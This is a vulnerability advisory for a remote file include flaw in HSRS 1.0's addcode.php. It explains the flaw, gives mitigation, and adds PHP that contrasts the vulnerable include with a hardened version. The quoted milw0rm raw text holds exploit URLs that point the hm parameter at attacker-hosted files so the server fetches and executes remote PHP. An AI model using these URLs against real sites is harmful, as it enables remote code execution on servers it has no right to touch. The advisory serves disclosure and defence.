Vendor: HSRS
By: CoLd Zero
CVSS: 7.5 (HIGH)
CWE: Remote File Include
Product Name: HSRS
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
Year: 2006

HSRS <= 1.0 (HIOX Star Rating System Script) (addcode.php) Remote File Include Vulnerability

HSRS 1.0 (HIOX Star Rating System Script) builds an include path from the uninitialised variable $hm in addcode.php (include "$hm/auth/config.php";). On a PHP installation with register_globals enabled, $hm is populated directly from the hm request parameter, and with allow_url_fopen (or, from PHP 5.2, allow_url_include) enabled the include resolves to a URL of the attacker's choosing. An unauthenticated remote attacker can therefore make the server fetch and execute arbitrary PHP code. The trailing ?cmd in the published example turns the appended /auth/config.php into part of the query string, so the remote file itself is what gets fetched and executed.

Mitigation:

No patched version is listed on this page. Remove the dependency on request input: assign $hm a fixed local path (for example derived from dirname(__FILE__) or __DIR__) before the include, or validate it against a short allowlist of directory names. At the platform level, set register_globals = Off and allow_url_include = Off (and allow_url_fopen = Off where the application does not need it) so that an unset variable can neither be supplied by the client nor resolve to a remote URL.
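The following PHP is an added illustration for this advisory; it is not code from HSRS or from the advisory author. It reproduces the vulnerable pattern of addcode.php with the effect of register_globals written out explicitly, and places a hardened form beside it. The request arrays, the allowlist of install directories (ALLOWED_INSTALL_DIRS) and the function names are assumptions made for the example; the attacker URL is the one from the advisory's own example.

```php
<?php
// Added example: not code from the HSRS script or the advisory author.
// Demonstrates the addcode.php pattern  include "$hm/auth/config.php";
// and a hardened replacement. Request arrays below are constructed.

// ---- Vulnerable: what register_globals does to addcode.php -----------------
// $hm is never assigned in addcode.php. With register_globals=On, PHP creates
// $hm from ?hm=... in the query string; the first line of this function
// emulates that explicitly.
function vulnerable_config_path(array $request): string
{
    $hm = $request['hm'] ?? '';
    return "$hm/auth/config.php";   // attacker controls the entire prefix
}

// ---- Hardened: the include base never comes from the request ---------------
// If the install directory really must be configurable, accept only a bare
// directory name from a fixed allowlist and anchor it under __DIR__. URLs,
// absolute paths and traversal sequences all fail the pattern check.
const ALLOWED_INSTALL_DIRS = ['HSRS', 'rating'];   // assumption for the example

function hardened_config_path(array $request): string
{
    $dir = $request['hm'] ?? 'HSRS';
    if (!preg_match('/^[A-Za-z0-9_-]+$/', $dir)
        || !in_array($dir, ALLOWED_INSTALL_DIRS, true)) {
        throw new InvalidArgumentException("invalid install dir: $dir");
    }
    // __DIR__ is fixed at deploy time and the validated name cannot contain
    // "://", so no stream wrapper (http://, ftp://, php://, data:) is ever
    // consulted by include.
    return __DIR__ . DIRECTORY_SEPARATOR . $dir
        . DIRECTORY_SEPARATOR . 'auth' . DIRECTORY_SEPARATOR . 'config.php';
}

// Constructed request mirroring the advisory's example URL.
$attack = ['hm' => 'http://www.violatorthrash.com/flyers/cold.txt?cmd'];

// With the vulnerable pattern, include() would open this string as a URL:
// the "/auth/config.php" suffix lands in the query string after "?cmd", so
// cold.txt is what the server downloads and executes as PHP.
echo 'vulnerable: ', vulnerable_config_path($attack), PHP_EOL;

try {
    hardened_config_path($attack);
} catch (InvalidArgumentException $e) {
    echo 'hardened: rejected (', $e->getMessage(), ')', PHP_EOL;
}

// A legitimate value still resolves to a local file under the script directory.
echo 'hardened: ', hardened_config_path(['hm' => 'HSRS']), PHP_EOL;
```

Run it with the PHP CLI (php example.php). The application-level fix is the important one because it works regardless of php.ini, but in practice both should be applied: register_globals = Off stops unset variables from being filled from the request at all, and allow_url_include = Off stops include() from resolving http:// and ftp:// targets even when a path is attacker-controlled.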
Source

Exploit-DB raw data:

--------------------------------------||    Viva Palestine ||-----------------------------------------
--------------------------------------||  Free Saddam Hussein ||-----------------------------------------


HSRS <= 1.0 (HIOX Star Rating System Script) (addcode.php) Remote File Include Vulnerability



Found By  :  CoLd Zero  [ Wasem898 ]

Source    :  include_once ($4AZHAR_TeAM."Securty.");

            require ($SpECiALPowEr.oRg_TeAm."Securty");

            A_mal Hacking Team _ Hacking



PalesTine Arab Muslim Hacker

http://www.smileygenerator.us/smileysig2/links/918742001154432992.final.gif

######################################################
#
#            HSRS 1.0 (HIOX Star Rating System Script)
#
# Class:     Remote File Include Vulnerability
# Published  2006-11-23
# Remote:    Yes
# Type:      High
# Site:      http://www.hscripts.com/scripts/php/downloads/HSRS.zip
#
# Author:    Cold Zero
# Contact:   c.o.1.d.0@hotmail.com
#
######################################################

About :
FREE Five Star Rating System Script that can be added in any web page with
php support.
A database based script developed using php and javascript.
This gives your users a chance to rate your articles, tutorials, photos,
images or whatever you want on a scale of 1-5 stars.

==========================

File: addcode.php

==========================

 include "$hm/auth/config.php";

======================================================
Example:

http://www.jusmail.com/5000/HSRS/addcode.php?hm=http://www.violatorthrash.com/flyers/cold.txt?cmd

======================================================
Exploit :

Http://www.Victem.0/[PaTH]/addcode.php?hm=http://coldzero.shell?cmd


======================================================

----  GreeTz: [MoHaNdKo] [Cold ThreE] [Viper Hacker] [The Wolf KSA] [o0xxdark0o] [OrGanza] [H@mLiT] [Snake12][Root Shell]
              [Metoovit] [Fucker_net] [Rageb][CoDeR] [HuGe][Str0ke] [Dr.TaiGaR] [JEeN HacKer] [Nazy L!unx]


****************************************************************
# *www.4azhar.com Securty Team    >>      www.4azhar.com        *
# *SpeciaL PoweR SecuritY Team    >>      www.specialpower.org  *
# *A_mal Hacking Team             >>      -vv -l -p The-Pradise *
*****************************************************************





# milw0rm.com [2006-11-23]